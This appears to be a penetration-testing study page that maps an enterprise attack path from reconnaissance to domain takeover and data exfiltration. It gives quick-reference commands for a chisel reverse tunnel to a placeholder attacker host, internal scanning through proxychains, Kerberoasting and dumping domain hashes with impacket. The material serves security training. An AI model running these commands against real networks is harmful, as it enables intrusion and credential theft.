Enterprise Attack Simulation
Full scope enterprise penetration test
Attacking Enterprise NetworksTip: Click on any node to see related information!
Interactive Mind Map
graph TD
A[External] --> B[Phishing/Web]
B --> C[Initial Access]
C --> D[Internal Recon]
D --> E[Pivot/Tunnel]
E --> F[AD Enumeration]
F --> G[Lateral Movement]
G --> H[Privilege Escalation]
H --> I[Domain Admin]
I --> J[Data Exfiltration]
Related Modules
Quick Reference
Attack Path Overview
- External Recon: Subdomain enum, OSINT
- Initial Access: Web exploit, phishing
- Internal Pivot: Tunnel to internal network
- AD Compromise: Kerberoast, credential reuse
- Domain Admin: DCSync, Golden Ticket
External to Internal
# Gain foothold via web app # Set up pivot chisel client ATTACKER:8000 R:socks # Establish SOCKS tunnel # Scan internal proxychains nmap -sT 172.16.0.0/24 # Scan internal network via proxy
AD Takeover
GetUserSPNs.py domain/user -dc-ip DC_IP -request # Kerberoast impacket-secretsdump domain/admin@DC_IP # Dump domain hashes